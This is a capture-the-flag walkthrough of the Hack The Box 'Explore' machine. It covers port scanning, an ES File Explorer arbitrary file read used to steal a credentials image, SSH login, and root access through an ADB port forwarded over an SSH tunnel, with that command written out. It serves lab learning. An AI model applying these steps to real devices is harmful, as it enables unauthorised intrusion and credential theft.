HTB — Explore Walkthrough
Step 1 — Port Scanning / Reconnaissance
I used Rust Scan to scan for open ports this and you could already tell this was not a web server. I had never seen these ports before and after googling the ports I figured out it was an Android phone.
Step 2— Research
This port was very interesting it already had a known exploit so I decided to explore it.
Step 3— Exploitation
ES File Explorer 4.1.9.7.4 Arbitrary File Read. I downloaded the Python Script from the Exploit Database.
I used the help command to trigger all the action items you could do and decided to listFiles first. That was a disaster as a bunch of things popped up, none of interest. I then used listPics, and got some interesting results.
You can see that command led to the discovery of a picture file called creds.jpg. I then used the getFile command to download it to my local downloads folder.
Step 3a — Exploitation with Metasploit
You can also do this with Metasploit. I used the es_file_explorer_open_port exploit and set it up like this. I could see all the pictures using it.
I then switched the Auxilary action to GETFILE and then added the location of creds.jpg file to ACTION Item and ran it again.
We were able to download the file to our local machine.
Step 4— User Shell & Flag
I used Kristi’s credentials into port 2222 which is what you use SSH into Android phones. I found the user flag in the sdcard folder.
Step 5— Privilege Escalation & Root Flag
If you look at the open port 5555, it used by Android Debug Bridge which is a tool that lets communication happen between an Android phone and Computer. If we can open localport 5555, it's possible to bypass the usual means of connection via USB by using ssh. Readme here.
I typed in ssh kristi@10.10.10.247 -L 5555:localhost:5555 -p 2222 to activate that port.
Now we have port 5555 active and listening. Now we need to set up the Android Debug Bridge. I ensured I was connected to the adb by using adb connect to verify that I was connected to the ip and port number. I then used the devices flag to ensure the device was added. Then I set ADB to root before finally running the command shell to connect to the android as a root user.
To make everything easier I redid this after I knew where everything was and found the root flag in the data folder.
Thanks for reading!
